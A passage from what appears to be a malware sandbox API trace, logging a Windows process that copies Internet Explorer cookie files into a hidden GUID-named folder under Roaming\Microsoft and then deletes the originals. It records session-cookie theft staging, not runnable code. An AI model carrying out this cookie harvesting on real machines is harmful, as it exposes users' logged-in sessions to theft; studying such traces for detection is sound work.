"c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.669] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.669] StrChrW (lpStart="Low\\MBJX4MYA.txt", wMatch=0x74c005c) returned="\\MBJX4MYA.txt" [0252.669] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.670] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.670] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.670] StrChrW (lpStart="MBJX4MYA.txt", wMatch=0x74c005c) returned 0x0 [0252.670] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="MBJX4MYA.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MBJX4MYA.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MBJX4MYA.txt" [0252.670] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MBJX4MYA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\mbjx4mya.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MBJX4MYA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\mbjx4mya.txt"), bFailIfExists=0) returned 1 [0252.682] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MBJX4MYA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\mbjx4mya.txt")) returned 1 [0252.683] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.683] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.683] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.683] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.683] StrChrW (lpStart="Low\\MCAKE788.txt", wMatch=0x74c005c) returned="\\MCAKE788.txt" [0252.683] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.683] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.684] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.684] StrChrW (lpStart="MCAKE788.txt", wMatch=0x74c005c) returned 0x0 [0252.684] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="MCAKE788.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MCAKE788.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MCAKE788.txt" [0252.684] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MCAKE788.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\mcake788.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MCAKE788.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\mcake788.txt"), bFailIfExists=0) returned 1 [0252.688] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MCAKE788.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\mcake788.txt")) returned 1 [0252.689] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.689] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.689] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.689] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.689] StrChrW (lpStart="Low\\MIL4MU1S.txt", wMatch=0x74c005c) returned="\\MIL4MU1S.txt" [0252.689] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.689] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.689] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.689] StrChrW (lpStart="MIL4MU1S.txt", wMatch=0x74c005c) returned 0x0 [0252.689] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="MIL4MU1S.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MIL4MU1S.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MIL4MU1S.txt" [0252.689] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MIL4MU1S.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\mil4mu1s.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MIL4MU1S.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\mil4mu1s.txt"), bFailIfExists=0) returned 1 [0252.694] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MIL4MU1S.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\mil4mu1s.txt")) returned 1 [0252.695] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.696] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.696] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.696] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.696] StrChrW (lpStart="Low\\MM8KB9U2.txt", wMatch=0x74c005c) returned="\\MM8KB9U2.txt" [0252.696] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.696] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.696] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.696] StrChrW (lpStart="MM8KB9U2.txt", wMatch=0x74c005c) returned 0x0 [0252.696] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="MM8KB9U2.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MM8KB9U2.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MM8KB9U2.txt" [0252.696] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MM8KB9U2.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\mm8kb9u2.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MM8KB9U2.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\mm8kb9u2.txt"), bFailIfExists=0) returned 1 [0252.730] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MM8KB9U2.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\mm8kb9u2.txt")) returned 1 [0252.731] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.731] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.731] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.731] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.731] StrChrW (lpStart="Low\\MMPF10F4.txt", wMatch=0x74c005c) returned="\\MMPF10F4.txt" [0252.731] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.731] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.731] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.731] StrChrW (lpStart="MMPF10F4.txt", wMatch=0x74c005c) returned 0x0 [0252.731] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="MMPF10F4.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MMPF10F4.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MMPF10F4.txt" [0252.731] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MMPF10F4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\mmpf10f4.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MMPF10F4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\mmpf10f4.txt"), bFailIfExists=0) returned 1 [0252.737] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MMPF10F4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\mmpf10f4.txt")) returned 1 [0252.738] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.738] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.738] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.738] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.738] StrChrW (lpStart="Low\\MOE7DCQU.txt", wMatch=0x74c005c) returned="\\MOE7DCQU.txt" [0252.738] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.738] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.738] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.738] StrChrW (lpStart="MOE7DCQU.txt", wMatch=0x74c005c) returned 0x0 [0252.738] lstrcatW (in: 